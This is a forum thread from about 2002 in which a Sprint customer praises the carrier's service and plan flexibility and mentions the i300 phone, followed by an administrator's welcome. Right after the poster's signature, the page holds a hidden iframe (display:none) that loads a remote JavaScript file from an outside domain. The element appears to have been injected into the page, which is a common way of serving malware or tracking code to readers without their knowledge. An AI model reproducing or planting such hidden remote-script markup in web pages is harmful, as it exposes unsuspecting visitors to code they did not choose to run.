+ Reply to Thread

Thread: i300 user :)

i300 user :)

I hope this is the right forum to be typing this but anyways, I've had my i300 since the first month it came out and it's been great. I'm going ot upgrade to the i330 when it is out. I just wanted to share a couple experiences with all of you as I've been lurking the boards for quite some time now

anyways, I've been a sprint customer since 1997 amazingly still with them... =P the were pretty bad in the begining. Since about 1999 I have had NO problems with service coverage in California, thumbs up. I have however had issues with my plan and what not.

Sprint customer service is great, I've logged hundreds of hours with them and most of those hours were to change plans here and there based upon my needs. Since sprint only requires you to sign up for a new 1 year each time you change plans why not, I wasn't going to leave them. So as my needs changed, so could my service plan. Email me to brag about your service plan deals I don't think it's good to brag in public .

Of course I have been over the allowed minutes at some point in those past 5 and a half years and I've paid for them but one time when my will was huge $450+ I called in and asked to change my plan to one with greater anytime minutes. They did that and I asked if they would help me out for this month which they did. I can't believe how helpful Sprint is. I know they're geared to keeping customers through satisfaction but I believe they go above and beyond other carriers. I have experience with AT&T, Verizon and Cingular. All have OK... CSR's but most of them aren't willing to even give you the time of day let alone work with you on your plan and be flexible.

With any carrier in the US we all pay about the same for relatively the sme amount of minutes, mainstream deals not retention or discounted plans, and with Sprint you get great CS and flexibility within your service as well as Claire

So I'll be a regular on this board, as far as posting goes, soon as my i330 comes in! Can't wait.

Thanks to all that read.

Steven<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by macksks; 11-06-2002 at 11:21 AM.

Administrator

Arrow

welcome to the board.